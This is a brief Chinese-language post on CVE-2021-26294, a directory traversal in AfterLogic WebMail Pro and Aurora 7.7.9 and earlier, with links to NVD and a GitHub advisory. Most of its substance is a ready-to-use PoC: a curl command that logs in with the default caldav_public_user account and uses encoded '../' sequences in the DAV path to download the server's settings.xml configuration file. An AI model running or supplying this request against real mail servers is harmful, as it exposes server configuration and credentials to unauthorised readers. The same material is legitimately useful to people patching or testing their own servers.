# WebMail Pro 7.7.9 目录遍历 (CVE-2021-26294)
7.7.9及所有更低版本的AfterLogic Aurora和WebMail Pro产品受影响,允许未经授权的攻击者读取文件,比如数据库/用户配置文件等。
PoC:
“`
curl -u ‘caldav_public_user@localhost:caldav_public_user’ “https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml”
“`
ref:
* https://nvd.nist.gov/vuln/detail/CVE-2021-26294
* https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容